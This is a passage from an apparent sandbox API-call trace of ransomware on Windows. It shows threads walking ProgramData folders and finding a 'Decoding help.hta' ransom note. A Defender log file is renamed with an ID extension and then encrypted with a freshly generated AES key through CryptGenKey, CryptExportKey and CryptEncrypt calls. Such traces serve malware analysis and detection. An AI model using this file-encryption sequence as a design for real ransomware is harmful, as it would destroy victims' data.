lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*" [0050.387] GlobalMemoryStatus (in: lpBuffer=0x16c9fd10 | out: lpBuffer=0x16c9fd10) [0050.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4280798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a4 [0050.388] CloseHandle (hObject=0x4a4) returned 1 [0050.388] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Updates", cAlternateFileName="")) returned 1 [0050.388] lstrcmpW (lpString1=".", lpString2="Updates") returned -1 [0050.388] lstrcmpW (lpString1="..", lpString2="Updates") returned -1 [0050.388] lstrcmpiW (lpString1="windows", lpString2="Updates") returned 1 [0050.388] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.389] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 68 [0050.389] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0050.389] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*" [0050.389] GlobalMemoryStatus (in: lpBuffer=0x16c9fd10 | out: lpBuffer=0x16c9fd10) [0050.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c90388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a4 [0050.389] CloseHandle (hObject=0x4a4) returned 1 [0050.389] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 1 [0050.389] lstrcmpW (lpString1=".", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned -1 [0050.390] lstrcmpW (lpString1="..", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned -1 [0050.390] lstrcmpiW (lpString1="windows", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 1 [0050.390] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.390] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 68 [0050.390] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0050.390] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" [0050.390] GlobalMemoryStatus (in: lpBuffer=0x16c9fd10 | out: lpBuffer=0x16c9fd10) [0050.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108683f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a4 [0050.391] CloseHandle (hObject=0x4a4) returned 1 [0050.391] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 0 [0050.391] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 562 os_tid = 0xd0c [0048.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*.*", lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.391] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.391] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.391] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0050.391] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 563 os_tid = 0xd10 [0048.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*.*", lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.392] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.392] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.392] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.392] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0050.392] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 564 os_tid = 0xd14 [0048.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*", lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2770 [0050.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.041] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.041] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.042] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0050.042] lstrcmpW (lpString1=".", lpString2="History") returned -1 [0050.042] lstrcmpW (lpString1="..", lpString2="History") returned -1 [0050.042] lstrcmpiW (lpString1="windows", lpString2="History") returned 1 [0050.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*" [0050.253] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*") returned 55 [0050.253] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\", lpString2="History" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" [0050.253] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0050.253] GlobalMemoryStatus (in: lpBuffer=0x16f9fd10 | out: lpBuffer=0x16f9fd10) [0050.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2512f920, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x554 [0050.259] CloseHandle (hObject=0x554) returned 1 [0050.259] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0050.259] FindClose (in: hFindFile=0x5e2770 | out: hFindFile=0x5e2770) returned 1 Thread: id = 565 os_tid = 0xd18 [0048.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*", lpFindFileData=0x1709fd30 | out: lpFindFileData=0x1709fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x27aac2b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2eb0 [0054.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.110] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1709fd30 | out: lpFindFileData=0x1709fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x27aac2b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x27aac2b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.831] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.832] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1709fd30 | out: lpFindFileData=0x1709fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27198ed0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x27198ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x27198ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0056.832] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" [0056.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned 57 [0056.832] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" [0056.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\decoding help.hta")) returned 0x2020 [0056.832] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1709fd30 | out: lpFindFileData=0x1709fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76792c22, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x798d48a0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x30ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPLog-07132009-221054.log", cAlternateFileName="MPLOG-~1.LOG")) returned 1 [0056.832] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" [0056.832] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned 57 [0056.832] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" [0056.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\decoding help.hta")) returned 0x2020 [0056.832] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MPLog-07132009-221054.log") returned -1 [0056.832] lstrlenW (lpString="MPLog-07132009-221054.log") returned 25 [0056.833] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" [0056.833] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned 57 [0056.833] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\", lpString2="MPLog-07132009-221054.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" [0056.833] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" [0056.833] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.[ID]g9uZrLhJaygpwRm1[ID]" [0056.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.804] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x95c [0060.804] CreateFileMappingA (hFile=0x95c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x958 [0060.804] CryptAcquireContextA (in: phProv=0x1709fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1709fcec*=0x10e28ce0) returned 1 [0060.805] CryptGenKey (in: hProv=0x10e28ce0, Algid=0x6610, dwFlags=0x1, phKey=0x1709fce8 | out: phKey=0x1709fce8*=0x5db7f8) returned 1 [0060.805] CryptExportKey (in: hKey=0x5db7f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1709fbe4, pdwDataLen=0x1709fce4 | out: pbData=0x1709fbe4*, pdwDataLen=0x1709fce4*=0x2c) returned 1 [0060.805] MapViewOfFile (hFileMappingObject=0x958, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30ac0) returned 0x6d50000 [0065.071] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1709fbe4*, pdwDataLen=0x1709fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1709fbe4*, pdwDataLen=0x1709fcf8*=0x100) returned 1 [0065.071] CryptEncrypt (hKey=0x5db7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6d50000, pdwDataLen=0x1709fce4*=0x30ac0, dwBufLen=0x30ac0) Thread: id = 566 os_tid = 0xd1c [0048.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2f30 [0049.740] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.740] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.740] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.740] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0049.740] FindClose (in: hFindFile=0x5e2f30 | out: hFindFile=0x5e2f30) returned 1 Thread: id = 567 os_tid = 0xd20 [0048.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*", lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.559] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.559] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.559] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActivityLog", 